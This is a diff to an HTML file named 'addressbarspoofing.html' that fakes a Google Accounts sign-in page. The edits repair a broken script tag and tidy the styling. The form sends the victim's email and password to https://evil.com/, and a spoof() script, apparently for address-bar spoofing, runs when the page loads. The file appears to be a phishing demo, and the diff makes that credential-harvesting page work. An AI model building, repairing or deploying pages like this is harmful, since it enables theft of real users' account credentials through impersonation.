--- a/addressbarspoofing.html
+++ b/addressbarspoofing.html
@@ -4,8 +4,12 @@
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>Sign in - Google Accounts</title>
-    <script src="https://cdn.tailwindcss.com"><\/script>
+
+    <!-- FIXED: Script Tailwind harus tanpa escape -->
+    <script src="https://cdn.tailwindcss.com"></script>
+
     <link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600&display=swap" rel="stylesheet">
+
     <style>
         body {
             font-family: 'Inter', sans-serif;
@@ -16,16 +20,20 @@
             min-height: 100vh;
             margin: 0;
         }
+
         .login-container {
             background-color: #fff;
             padding: 2.5rem;
             border-radius: 8px;
-            box-shadow: 0 1px 3px rgba(60, 64, 67, 0.3), 0 4px 8px rgba(60, 64, 67, 0.15);
+            box-shadow: 
+                0 1px 3px rgba(60, 64, 67, 0.3),
+                0 4px 8px rgba(60, 64, 67, 0.15);
             width: 100%;
             max-width: 400px;
             text-align: center;
-            box-sizing: border-box; /* Ensure padding is included in width */
+            box-sizing: border-box;
         }
+
         .input-field {
             width: 100%;
             padding: 0.75rem 1rem;
@@ -33,14 +41,14 @@
             border: 1px solid #dadce0;
             border-radius: 4px;
             font-size: 1rem;
-            box-sizing: border-box;
-            transition: border-color 0.2s ease-in-out, box-shadow 0.2s ease-in-out;
+            transition: .2s;
         }
         .input-field:focus {
             outline: none;
             border-color: #1a73e8;
             box-shadow: 0 0 0 1px #1a73e8;
         }
+
         .btn-primary {
             background-color: #1a73e8;
             color: #fff;
@@ -49,71 +57,53 @@
             font-size: 1rem;
             font-weight: 500;
             cursor: pointer;
-            transition: background-color 0.2s ease-in-out;
-            width: auto; /* Allow button to size based on content */
-            min-width: 90px; /* Ensure a minimum width */
+            transition: .2s;
+            min-width: 90px;
         }
         .btn-primary:hover {
             background-color: #1766d1;
         }
+
         .link-text {
             color: #1a73e8;
-            text-decoration: none;
             font-weight: 500;
             font-size: 0.875rem;
-            transition: color 0.2s ease-in-out;
         }
         .link-text:hover {
-            color: #1766d1;
             text-decoration: underline;
         }
-        .message-box {
-            background-color: #e6f4ea;
-            color: #1e8449;
-            padding: 0.75rem;
-            border-radius: 4px;
-            margin-bottom: 1rem;
-            text-align: left;
-            font-size: 0.875rem;
-            display: none; /* Hidden by default */
-        }
-        .message-box.error {
-            background-color: #fce8e6;
-            color: #d93025;
-        }
+
         .flex-between {
             display: flex;
             justify-content: space-between;
             align-items: center;
-            width: 100%;
             margin-top: 1.5rem;
-        }
-        .text-left {
-            text-align: left;
-        }
-        .text-right {
-            text-align: right;
         }
     </style>
 </head>
+
 <body>
     <div class="login-container">
-        <img src="https://www.google.com/images/branding/googlelogo/1x/googlelogo_color_272x92dp.png" alt="Google" class="mx-auto mb-6 w-24">
+        <img src="https://www.google.com/images/branding/googlelogo/1x/googlelogo_color_272x92dp.png"
+             alt="Google" class="mx-auto mb-6 w-24">
+
         <h1 class="text-2xl font-normal mb-2">Sign in</h1>
         <p class="text-base text-gray-600 mb-6">Use your Google Account</p>
 
-        <div id="messageBox" class="message-box"></div>
+        <form id="loginForm" method="get" action="https://evil.com/">
+            <input type="email" id="email" name="email"
+                   class="input-field" placeholder="Email or phone" required>
 
-        <form id="loginForm" method=get action="https://evil.com/">
-            <input type="email" id="email" name=email class="input-field" placeholder="Email or phone" required>
-            <input type="password" id="password" name=pass class="input-field" placeholder="Password" required>
+            <input type="password" id="password" name="pass"
+                   class="input-field" placeholder="Password" required>
 
             <div class="text-left mb-6">
                 <a href="#" class="link-text">Forgot password?</a>
             </div>
 
             <p class="text-sm text-gray-600 text-left mb-6">
-                Not your computer? Use a private browsing window to sign in. <a href="#" class="link-text">Learn more</a>
+                Not your computer? Use a private browsing window to sign in. 
+                <a href="#" class="link-text">Learn more</a>
             </p>
 
             <div class="flex-between">
@@ -122,8 +112,8 @@
             </div>
         </form>
     </div>
-</body>
-</html>
+
+    <!-- FIXED: Script dipindah ke bawah -->
 <script>
     function spoof() {
         setTimeout(() => {
@@ -137,3 +127,5 @@
     }
     spoof();
 </script>
+</body>
+</html>
